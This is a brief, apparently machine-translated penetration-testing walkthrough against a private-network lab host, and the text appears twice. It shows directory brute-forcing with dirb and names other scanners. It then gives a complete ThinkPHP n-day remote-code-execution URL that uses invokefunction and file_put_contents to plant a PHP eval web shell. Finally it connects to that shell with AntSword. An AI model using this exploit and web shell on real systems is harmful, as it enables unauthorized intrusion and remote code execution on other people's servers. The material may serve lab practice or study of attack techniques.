Technology Sharing

한어Русский языкEnglishFrançaisIndonesianSanskrit日本語DeutschPortuguêsΕλληνικάespañolItalianoSuomalainenLatina

Table of contents

External network management

Let's blast it first to see if there is any attack path.

I tried the suspicious path and found that it was the thinkphp framework. I also knew the version. So I played it on nday.

Write to PHP

​Edit and write PHP successfully, simply nday to win ​Edit

Ant Sword rce try link

Success

---

External network management

Let's blast it first to see if there is any attack path.

You can try tools such as dirsearch, dirb, gobuster, etc.

dirb http://192.168.20.130/

I tried the suspicious path and found that it was the thinkphp framework. I also knew the version. So I played it on nday.

Write to PHP

http://192.168.20.130/public/index.php?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST['cmd']);?>

Written into PHP successfully, it was easy to win in nday

http://192.168.20.130/public/shell.php

Ant Sword rce try link

Success